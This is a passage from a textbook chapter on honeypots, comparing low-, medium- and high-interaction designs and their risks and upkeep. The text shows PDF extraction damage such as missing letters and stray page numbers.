Deudor tributario

Level of interaction gives us a scale with which we could measure and compare honeypots. he more a honeypot can do and the more an attacker can do to a honeypot, the greater the information that can be derived from it. However, by the same token, the more an attacker can do to the honeypot, the more potential damage an attacker can incur.

Based on interaction levels, honeypots fall into three categories [1,20]:

low-interaction honeypots, medium interaction honeypots, and high-interaction honeypots.

5.4.1 Low-Interaction Honeypots

Low-interaction honeypots are the simplest in terms of implementation, typically are the easiest to install, conigure, deploy, and maintain because of their simple design and basic functionality. hese honeypots merely emulate a variety of services. herefore, the attacker is limited to inter-acting with these pre-designated services. For example, a low-interaction honeypot could emulate a standard Unix server with several running ser-vices, such as Telnet and FTP. An attacker could Telnet to the honeypot, get a banner that states the OS, and perhaps obtain a login prompt. he attacker can then attempt to log in by brute-force or by guessing the passwords. he honeypot would capture and collect these attempts, but we should mention that there is no real OS for the attacker to log in to.

So, the attacker’s interaction is limited to login attempts!

10 9

A T H E O R E T I C A L G U I D E T O H O N E Y P O T S

In fact, the main function of the low-interaction honeypots is detec-tion, speciically of unauthorized scans or unauthorized connection attempts. As we mentioned above, low-interaction honeypots ofer a limited functionality, most of this can be emulated by a program. he program is simply installed on a host system and conigured to ofer whatever services the admin wants, and the honeypot is ready. his makes both deployment and maintenance of the honeypot easy. All that the administrator has to do is to maintain patch levels of the pro-gram and monitor any alerting mechanisms.

Low-interaction honeypots have the lowest risk, because there are no real OSs for the attacker to interact with (i.e., all of the services are emulated not real). So, these honeypots cannot be used to harm or monitor other systems. Low-interaction honeypots log only limited information and are designed to capture known activities. An attacker can detect a low-interaction honeypot by executing a command that the emulation does not support.

One of the advantages of this approach is that the activities of the attacker are naturally sand-boxed within the boundaries of the software running on a host OS. he honeypot can pretend to be, for example, a Solaris server, with TCP/IP stack characteristics of a Solaris system emulated to fool OS ingerprinting and services that one would expect to see on such a server running Solaris. However, because these services are incompletely implemented, exploits written to compromise a Solaris server will at best result in a simulated com-promise of the honeypot. hat is, if the exploit is known and handled by the honeypot, the actual host OS is not compromised. At the worst case, the exploit will fail, because the exploit is unknown, or the vul-nerability is not implemented in the honeypot.

Another advantage of the low-interaction honeypot is that the attacker is also restricted from attacking other hosts from the hon-eypot system. his is again because the compromise of the server is emulated.

Using low-interaction honeypots has also some disadvantages, which come from the advantages! By deinition, no low-interaction emulation of an OS and its services will be complete. he responses an attacker would expect for known vulnerabilities and exploits are emulated, so a low-interaction honeypot will not respond accurately to exploits we have not included in the emulated responses. he  so-called

zero-day exploits would fall into this category. hese exploits are kept private by the attackers and it is therefore, diicult to prepare your honeypot for these kinds of exploits [18].

5.4.2 High-Interaction Honeypots

he high-interaction honeypots are so diferent from low-interaction honeypots in terms of implementation and collecting information.

hey utilize actual OSs rather than emulations. As actual OSs are used in the high-interaction honeypots, the attacker gets a more real-istic experience, and we can be able to gather more information about intended attacks. his makes high-interaction honeypots very useful in situations where one wishes to capture details of vulnerabilities or exploits that are not yet known to the public. hese vulnerabilities or exploits are being used only by a small number of attackers who dis-covered the vulnerability and wrote an exploit for it. Such exploits are known as zero-day exploits. It is very important to ind and publicize these vulnerabilities quickly, so that system administrators can ilter or work around these problems. Also vendors can develop and release software patches to ix these vulnerabilities [18].

he high-interaction honeypots are very dangerous, because the attackers can use these systems to harm other systems. So, most often high-interaction honeypots are placed within a controlled environ-ment, such as behind a irewall. he ability to control the attacker comes not from the honeypot itself but also from the network access control device—in many cases, the irewall. he irewall allows the attacker to compromise one of the honeypots sitting behind the ire-wall, but it does not let the attacker use the honeypot to launch attacks back out. Such architecture is very complex to deploy and maintain, especially if you do not want the attacker to realize that he is being monitored and controlled. A great deal of work goes into building a irewall with proper rule bases.

As we have mentioned above, the high-interaction honeypots need extensive control mechanisms; these can be extremely diicult and time consuming to install and conigure. To implement high-interaction honeypots, a variety of diferent technologies should be combined, such as irewall and IDSs. All of the technologies have to be prop-erly customized for the high-interaction honeypot. Maintenance is

111

A T H E O R E T I C A L G U I D E T O H O N E Y P O T S

also time-consuming, because we must update irewall rule bases and IDS signature databases and monitor the honeypot activity around the clock. Because of these complexities, the high-interaction hon-eypots have high risk. he more interaction we allow the attacker, the more that can go wrong. However, once implemented correctly, a high-interaction honeypot can give valuable insights about attackers that no other honeypot can.

5.4.3 Medium Interaction Honeypots

Medium interaction honeypots [19] try to combine the beneits of both approaches (low- and high-interaction honeypots) with regard to botnet detection and malware collection while removing their shortcomings.

he key feature of medium interaction honeypots is application layer virtualization. hey do not aim at fully simulating a full opera-tional system environment, nor do they implement all details of an application protocol. What the medium interaction honeypots do is to provide suicient responses that known exploits wait on certain ports that will trick them into sending their payloads.

Once the payload has been received, the shellcode is extracted and analyzed somehow. he medium interaction honeypot then emulates the actions the shellcode would perform to download the malware.

herefore, the honeypot has to provide some virtual ile system as well as virtual standard Windows download utilities. he honeypot can then download the malware from the serving location and store it locally or submit it somewhere else for analysis.